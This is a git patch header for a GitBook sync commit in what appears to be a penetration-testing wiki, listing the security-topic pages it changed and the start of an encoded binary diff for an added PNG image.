From ddf8210cf7c8b5d7469d130f3bffb7ec087b1712 Mon Sep 17 00:00:00 2001
From: CPol <carlospolop@gmail.com>
Date: Tue, 30 Nov 2021 16:46:07 +0000
Subject: [PATCH] GitBook: [#2876] save

---
 .gitbook/assets/image (630) (1).png           | Bin 0 -> 179389 bytes
 .gitbook/assets/image (630).png               | Bin 179389 -> 5268 bytes
 README.md                                     |   8 +-
 .../bra.i.nsmasher-presentation/README.md     |  10 +-
 .../basic-bruteforcer.md                      |   2 +-
 about-the-author.md                           |  18 +-
 android-forensics.md                          |   4 +-
 backdoors/salseo.md                           |  20 +-
 .../blockchain-and-crypto-currencies.md       |  58 ++--
 burp-suite.md                                 |  10 +-
 cloud-security/aws-security.md                | 230 +++++++--------
 cloud-security/cloud-security-review.md       |  15 +-
 cloud-security/gcp-security/README.md         |  42 +--
 ...ts-brute-force-and-privilege-escalation.md |   2 +-
 .../gcp-security/gcp-compute-enumeration.md   |   4 +-
 .../gcp-interesting-permissions.md            |  14 +-
 ...local-privilege-escalation-ssh-pivoting.md |  16 +-
 .../basic-github-information.md               |  13 +
 ...d-elearnsecurity-certifications-reviews.md |  28 +-
 cryptography/certificates.md                  |  20 +-
 .../cipher-block-chaining-cbc-mac-priv.md     |  18 +-
 cryptography/hash-length-extension-attack.md  |   4 +-
 .../try-hack-me/hc0n-christmas-ctf-2019.md    |   4 +-
 ctf-write-ups/try-hack-me/pickle-rick.md      |   6 +-
 emails-vulns.md                               |  12 +-
 .../bypassing-canary-and-pie.md               |  22 +-
 .../rop-leaking-libc-address/README.md        |  46 +--
 .../rop-leaking-libc-template.md              |   2 +-
 .../rop-syscall-execv.md                      |   8 +-
 exploiting/tools/README.md                    |  36 +--
 exploiting/tools/pwntools.md                  |  68 ++---
 ...windows-exploiting-basic-guide-oscp-lvl.md |   8 +-
 .../basic-forensic-methodology/README.md      |   8 +-
 .../anti-forensic-techniques.md               |  12 +-
 .../docker-forensics.md                       |  10 +-
 .../image-adquisition-and-mount.md            |   2 +-
 .../linux-forensics.md                        |  52 ++--
 .../malware-analysis.md                       |  22 +-
 .../memory-dump-analysis/README.md            |   4 +-
 .../volatility-examples.md                    |  22 +-
 .../partitions-file-systems-carving/README.md |  84 +++---
 .../partitions-file-systems-carving/ext.md    |  24 +-
 .../file-data-carving-recovery-tools.md       |  18 +-
 .../partitions-file-systems-carving/ntfs.md   |  72 ++---
 .../pcap-inspection/README.md                 |  12 +-
 .../pcap-inspection/dnscat-exfiltration.md    |   2 +-
 .../pcap-inspection/wifi-pcap-analysis.md     |   4 +-
 .../pcap-inspection/wireshark-tricks.md       |  12 +-
 .../.pyc.md                                   |  22 +-
 .../browser-artifacts.md                      |  90 +++---
 .../local-cloud-storage.md                    |  32 +-
 .../office-file-analysis.md                   |   8 +-
 .../windows-forensics/README.md               |  22 +-
 .../interesting-windows-registry-keys.md      |  12 +-
 .../windows-forensics/windows-processes.md    |   4 +-
 interesting-http.md                           |   2 +-
 linux-unix/linux-environment-variables.md     |   2 +-
 .../linux-privilege-escalation-checklist.md   |  64 ++--
 .../containerd-ctr-privilege-escalation.md    |   4 +-
 ...-command-injection-privilege-escalation.md |  26 +-
 .../docker-breakout/README.md                 |  20 +-
 .../docker-breakout/apparmor.md               |  12 +-
 ...uthn-docker-access-authorization-plugin.md |  20 +-
 .../docker-breakout/seccomp.md                |  10 +-
 .../escaping-from-limited-bash.md             |   8 +-
 .../interesting-groups-linux-pe/README.md     |  30 +-
 .../lxd-privilege-escalation.md               |   4 +-
 .../ld.so.conf-example.md                     |  24 +-
 .../linux-active-directory.md                 |   8 +-
 linux-unix/privilege-escalation/logstash.md   |   4 +-
 .../nfs-no_root_squash-misconfiguration-pe.md |  24 +-
 .../runc-privilege-escalation.md              |   2 +-
 .../socket-command-injection.md               |   4 +-
 .../splunk-lpe-and-persistence.md             |  24 +-
 .../ssh-forward-agent-exploitation.md         |   8 +-
 .../wildcards-spare-tricks.md                 |   6 +-
 .../bypass-bash-restrictions.md               |   2 +-
 .../README.md                                 |  48 +--
 .../mac-os-architecture.md                    |  26 +-
 ...s-apps-inspecting-debugging-and-fuzzing.md |  36 +--
 .../macos-mdm/README.md                       |  10 +-
 ...nrolling-devices-in-other-organisations.md |  14 +-
 .../macos-protocols.md                        |   6 +-
 .../macos-red-teaming.md                      |   4 +-
 .../bypass-python-sandboxes/README.md         |  28 +-
 misc/basic-python/magic-methods.md            |  16 +-
 .../android-app-pentesting/README.md          |  16 +-
 .../android-app-pentesting/adb-commands.md    |   8 +-
 .../android-applications-basics.md            |  44 +--
 .../android-burp-suite-settings.md            |   6 +-
 .../android-task-hijacking.md                 |   4 +-
 .../android-app-pentesting/apk-decompilers.md |  10 +-
 .../avd-android-virtual-device.md             |  28 +-
 .../content-protocol.md                       |   6 +-
 .../exploiting-content-providers.md           |  26 +-
 .../exploiting-a-debuggeable-applciation.md   |   2 +-
 .../frida-tutorial/README.md                  |   6 +-
 .../frida-tutorial/frida-tutorial-1.md        |   2 +-
 .../frida-tutorial/owaspuncrackable-1.md      |  10 +-
 .../google-ctf-2018-shall-we-play-a-game.md   |   4 +-
 .../inspeckage-tutorial.md                    |  12 +-
 .../intent-injection.md                       |  10 +-
 .../make-apk-accept-ca-certificate.md         |   4 +-
 .../react-native-application.md               |   4 +-
 .../android-app-pentesting/smali-changes.md   |   4 +-
 .../spoofing-your-location-in-play-store.md   |   2 +-
 .../android-app-pentesting/webview-attacks.md |  20 +-
 mobile-apps-pentesting/android-checklist.md   |  10 +-
 .../ios-pentesting-checklist.md               |  18 +-
 .../basic-ios-testing-operations.md           |  22 +-
 .../burp-configuration-for-ios.md             |   6 +-
 ...-entitlements-from-compiled-application.md |   2 +-
 .../frida-configuration-in-ios.md             |   4 +-
 .../ios-pentesting/ios-app-extensions.md      |  10 +-
 .../ios-pentesting/ios-basics.md              |  24 +-
 ...m-uri-handlers-deeplinks-custom-schemes.md |  12 +-
 .../ios-serialisation-and-encoding.md         |   8 +-
 .../ios-pentesting/ios-testing-environment.md |  16 +-
 .../ios-pentesting/ios-uiactivity-sharing.md  |   8 +-
 .../ios-pentesting/ios-uipasteboard.md        |   8 +-
 .../ios-pentesting/ios-universal-links.md     |   8 +-
 .../ios-pentesting/ios-webviews.md            |  12 +-
 other-web-tricks.md                           |   4 +-
 pentesting-web/bypass-payment-process.md      |   6 +-
 pentesting-web/cache-deception.md             |  24 +-
 pentesting-web/captcha-bypass.md              |  10 +-
 pentesting-web/clickjacking.md                |  24 +-
 .../client-side-template-injection-csti.md    |  12 +-
 .../content-security-policy-csp-bypass.md     |  26 +-
 pentesting-web/cors-bypass.md                 |  68 ++++-
 pentesting-web/crlf-0d-0a.md                  |   4 +-
 .../cross-site-websocket-hijacking-cswsh.md   |  14 +-
 .../csrf-cross-site-request-forgery.md        |  70 ++++-
 pentesting-web/deserialization/README.md      | 104 +++----
 ...er-gadgets-expandedwrapper-and-json.net.md |  22 +-
 ...ialization-objectinputstream-readobject.md |   8 +-
 ...ploiting-__viewstate-knowing-the-secret.md |  44 +--
 .../exploiting-__viewstate-parameter.md       |  34 +--
 ...ava-dns-deserialization-and-gadgetprobe.md |  30 +-
 ...ava-transformers-to-rutime-exec-payload.md |   8 +-
 .../README.md                                 |  20 +-
 .../client-side-prototype-pollution.md        |   6 +-
 .../python-yaml-deserialization.md            |   4 +-
 pentesting-web/email-header-injection.md      |   2 +-
 .../file-inclusion/phar-deserialization.md    |   8 +-
 pentesting-web/file-upload/README.md          |   4 +-
 pentesting-web/formula-injection.md           |   6 +-
 pentesting-web/h2c-smuggling.md               |  12 +-
 pentesting-web/hacking-jwt-json-web-tokens.md |  22 +-
 pentesting-web/hacking-with-cookies/README.md |  22 +-
 .../hacking-with-cookies/cookie-bomb.md       |   2 +-
 .../cookie-jar-overflow.md                    |   2 +-
 .../hacking-with-cookies/cookie-tossing.md    |  12 +-
 .../http-request-smuggling/README.md          |  52 ++--
 .../request-smuggling-in-http-2-downgrades.md |  10 +-
 .../http-response-smuggling-desync.md         |  14 +-
 pentesting-web/idor.md                        |  28 +-
 pentesting-web/login-bypass/README.md         |   6 +-
 .../login-bypass/sql-login-bypass.md          |   2 +-
 pentesting-web/oauth-to-account-takeover.md   | 237 +++++++--------
 pentesting-web/parameter-pollution.md         |   8 +-
 .../pocs-and-polygloths-cheatsheet/README.md  |   2 +-
 pentesting-web/postmessage-vulnerabilities.md |  36 +--
 pentesting-web/race-condition.md              |  18 +-
 ...ular-expression-denial-of-service-redos.md |  12 +-
 pentesting-web/reverse-tab-nabbing.md         |  12 +-
 pentesting-web/saml-attacks/saml-basics.md    |   2 +-
 ...inclusion-edge-side-inclusion-injection.md |   4 +-
 pentesting-web/sql-injection/README.md        |   2 +-
 .../sql-injection/mssql-injection.md          |  30 +-
 .../sql-injection/mysql-injection/README.md   |  14 +-
 .../mysql-injection/mysql-ssrf.md             |   6 +-
 .../sql-injection/oracle-injection.md         |  52 ++--
 .../postgresql-injection/README.md            |  10 +-
 .../big-binary-files-upload-postgresql.md     |  20 +-
 .../dblink-lo_import-data-exfiltration.md     |  20 +-
 ...and-ntlm-chanllenge-response-disclosure.md |  14 +-
 .../pl-pgsql-password-bruteforce.md           |   6 +-
 .../rce-with-postgresql-extensions.md         |  22 +-
 pentesting-web/sql-injection/sqlmap/README.md |   6 +-
 .../sqlmap/second-order-injection-sqlmap.md   |   4 +-
 .../ssrf-server-side-request-forgery.md       | 120 ++++----
 .../el-expression-language.md                 |   6 +-
 .../unicode-normalization-vulnerability.md    |  16 +-
 .../web-vulnerabilities-methodology.md        |   2 +-
 pentesting-web/xs-search.md                   |  42 +--
 .../xss-cross-site-scripting/README.md        |   6 +-
 .../xss-cross-site-scripting/dom-xss.md       |  30 +-
 .../other-js-tricks.md                        |   6 +-
 .../xss-cross-site-scripting/pdf-injection.md | 170 +++++------
 .../server-side-xss-dynamic-pdf.md            |   4 +-
 .../xssi-cross-site-script-inclusion.md       |   6 +-
 pentesting-web/xxe-xee-xml-external-entity.md |  18 +-
 pentesting/11211-memcache.md                  |  10 +-
 pentesting/135-pentesting-msrpc.md            |  12 +-
 ...le-pentesting-requirements-installation.md |   2 +-
 .../remote-stealth-pass-brute-force.md        |  10 +-
 .../15672-pentesting-rabbitmq-management.md   |   4 +-
 pentesting/1883-pentesting-mqtt-mosquitto.md  |   8 +-
 pentesting/2375-pentesting-docker.md          |  12 +-
 pentesting/27017-27018-mongodb.md             |   2 +-
 pentesting/3632-pentesting-distcc.md          |   4 +-
 .../3690-pentesting-subversion-svn-server.md  |   2 +-
 ...ntesting-erlang-port-mapper-daemon-epmd.md |   4 +-
 pentesting/44818-ethernetip.md                |   2 +-
 pentesting/5000-pentesting-docker-registry.md |  24 +-
 ...060-50070-50075-50090-pentesting-hadoop.md |   2 +-
 pentesting/512-pentesting-rexec.md            |   2 +-
 .../515-pentesting-line-printer-daemon-lpd.md |   4 +-
 pentesting/5353-udp-multicast-dns-mdns.md     |   2 +-
 pentesting/554-8554-pentesting-rtsp.md        |   8 +-
 pentesting/5601-pentesting-kibana.md          |   6 +-
 pentesting/5671-5672-pentesting-amqp.md       |   4 +-
 pentesting/584-pentesting-afp.md              |   2 +-
 pentesting/623-udp-ipmi.md                    |  24 +-
 pentesting/69-udp-tftp.md                     |   4 +-
 pentesting/7-tcp-udp-pentesting-echo.md       |   4 +-
 pentesting/8086-pentesting-influxdb.md        |   8 +-
 pentesting/8089-splunkd.md                    |   4 +-
 pentesting/873-pentesting-rsync.md            |  12 +-
 pentesting/9000-pentesting-fastcgi.md         |   4 +-
 pentesting/9100-pjl.md                        |   2 +-
 pentesting/9200-pentesting-elasticsearch.md   |  72 ++---
 .../pentesting-ftp/ftp-bounce-attack.md       |   8 +-
 pentesting/pentesting-irc.md                  |   8 +-
 ...entesting-jdwp-java-debug-wire-protocol.md |   4 +-
 .../harvesting-tickets-from-linux.md          |  14 +-
 .../harvesting-tickets-from-windows.md        |   2 +-
 pentesting/pentesting-kubernetes/README.md    |  36 +--
 .../hardening-roles-clusterroles.md           |  56 ++--
 pentesting/pentesting-modbus.md               |   2 +-
 pentesting/pentesting-network/README.md       |   8 +-
 pentesting/pentesting-network/ids-evasion.md  |   8 +-
 .../pentesting-network/pentesting-ipv6.md     |   8 +-
 ...-ns-mdns-dns-and-wpad-and-relay-attacks.md |  38 +--
 .../spoofing-ssdp-and-upnp-devices.md         |  26 +-
 .../pentesting-network/wifi-attacks/README.md | 114 +++----
 .../wifi-attacks/evil-twin-eap-tls.md         |  24 +-
 pentesting/pentesting-printers/README.md      |  68 ++---
 .../pentesting-printers/accounting-bypass.md  |  12 +-
 .../pentesting-printers/buffer-overflows.md   |   8 +-
 .../credentials-disclosure-brute-force.md     |  10 +-
 .../cross-site-printing.md                    |  10 +-
 .../document-processing.md                    |   4 +-
 .../pentesting-printers/factory-defaults.md   |  14 +-
 .../pentesting-printers/file-system-access.md |   4 +-
 .../pentesting-printers/memory-access.md      |   6 +-
 .../pentesting-printers/physical-damage.md    |   4 +-
 .../print-job-manipulation.md                 |  14 +-
 .../print-job-retention.md                    |   6 +-
 .../transmission-channel.md                   |   4 +-
 pentesting/pentesting-remote-gdbserver.md     |   4 +-
 pentesting/pentesting-rlogin.md               |   4 +-
 pentesting/pentesting-rsh.md                  |   2 +-
 pentesting/pentesting-smtp/smtp-commands.md   |   2 +-
 pentesting/pentesting-vnc.md                  |   6 +-
 .../pentesting-web/403-and-401-bypasses.md    |   6 +-
 .../artifactory-hacking-guide.md              |  44 +--
 .../buckets/firebase-database.md              |  10 +-
 pentesting/pentesting-web/drupal.md           |   6 +-
 pentesting/pentesting-web/flask.md            |   6 +-
 .../pentesting-web/h2-java-sql-database.md    |   4 +-
 pentesting/pentesting-web/jboss.md            |   6 +-
 pentesting/pentesting-web/jenkins.md          |  14 +-
 pentesting/pentesting-web/jira.md             |   6 +-
 pentesting/pentesting-web/moodle.md           |   6 +-
 pentesting/pentesting-web/nginx.md            |  32 +-
 .../pentesting-web/php-tricks-esp/README.md   |  34 +--
 .../README.md                                 | 278 +++++++++---------
 .../disable_functions-bypass-dl-function.md   |  14 +-
 .../pentesting-web/put-method-webdav.md       |  24 +-
 .../pentesting-web/special-http-headers.md    |  28 +-
 pentesting/pentesting-web/spring-actuators.md |   8 +-
 pentesting/pentesting-web/symphony.md         |  62 ++--
 .../pentesting-web/uncovering-cloudflare.md   |   4 +-
 .../pentesting-web/web-api-pentesting.md      |  34 +--
 pentesting/pentesting-web/wordpress.md        |  50 ++--
 phishing-methodology/README.md                |   4 +-
 phishing-methodology/phishing-documents.md    |   2 +-
 .../escaping-from-gui-applications/README.md  |  54 ++--
 .../show-file-extensions.md                   |   2 +-
 post-exploitation.md                          |   2 +-
 reversing/common-api-used-in-malware.md       |   4 +-
 reversing/cryptographic-algorithms/README.md  |  22 +-
 .../unpacking-binaries.md                     |  10 +-
 .../reversing-tools-basic-methods/README.md   |  64 ++--
 .../angr/angr-examples.md                     |   8 +-
 .../cheat-engine.md                           |  36 +--
 .../satisfiability-modulo-theories-smt-z3.md  |   4 +-
 reversing/word-macros.md                      |   2 +-
 search-exploits.md                            |   4 +-
 shells/shells/linux.md                        |   4 +-
 ...itive-information-disclosure-from-a-web.md |   2 +-
 .../active-directory-methodology/README.md    |  10 +-
 .../acl-persistence-abuse.md                  |  28 +-
 .../ad-information-in-printers.md             |  10 +-
 .../asreproast.md                             |  10 +-
 .../bloodhound.md                             |  10 +-
 .../constrained-delegation.md                 |  12 +-
 .../custom-ssp.md                             |   4 +-
 .../active-directory-methodology/dcshadow.md  |  14 +-
 .../dsrm-credentials.md                       |   4 +-
 .../golden-ticket.md                          |   6 +-
 .../kerberoast.md                             |   8 +-
 .../kerberos-authentication.md                |  64 ++--
 .../mssql-trusted-links.md                    |   8 +-
 .../over-pass-the-hash-pass-the-key.md        |   4 +-
 .../printers-spooler-service-abuse.md         |   6 +-
 ...rivileged-accounts-and-token-privileges.md |  54 ++--
 .../resource-based-constrained-delegation.md  |  32 +-
 .../security-descriptors.md                   |   8 +-
 .../skeleton-key.md                           |  12 +-
 .../unconstrained-delegation.md               |  10 +-
 .../authentication-credentials-uac-and-efs.md |  78 ++---
 windows/av-bypass.md                          |  16 +-
 .../checklist-windows-privilege-escalation.md |  46 +--
 windows/ntlm/README.md                        |  52 ++--
 windows/ntlm/smbexec.md                       |  10 +-
 windows/ntlm/winrm.md                         |   2 +-
 windows/stealing-credentials/README.md        |  46 +--
 .../credentials-mimikatz.md                   |   8 +-
 .../credentials-protections.md                |  32 +-
 .../README.md                                 | 164 +++++------
 .../access-tokens.md                          |  16 +-
 .../acls-dacls-sacls-aces.md                  |  16 +-
 ...ectory-permission-over-service-registry.md |  16 +-
 .../create-msi-with-wix.md                    |   4 +-
 .../dll-hijacking.md                          |  32 +-
 .../dpapi-extracting-passwords.md             |   6 +-
 .../integrity-levels.md                       |  20 +-
 .../leaked-handle-exploitation.md             |   8 +-
 .../msi-wrapper.md                            |   4 +-
 .../named-pipe-client-impersonation.md        |   6 +-
 .../privilege-escalation-abusing-tokens.md    |  22 +-
 .../seimpersonate-from-high-to-system.md      |   2 +-
 335 files changed, 3301 insertions(+), 3216 deletions(-)
 create mode 100644 .gitbook/assets/image (630) (1).png

diff --git a/.gitbook/assets/image (630) (1).png b/.gitbook/assets/image (630) (1).png
new file mode 100644
index 0000000000000000000000000000000000000000..1065c7b8297611a5ada6a9a3c39e8d35216c1944
GIT binary patch
literal 179389
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
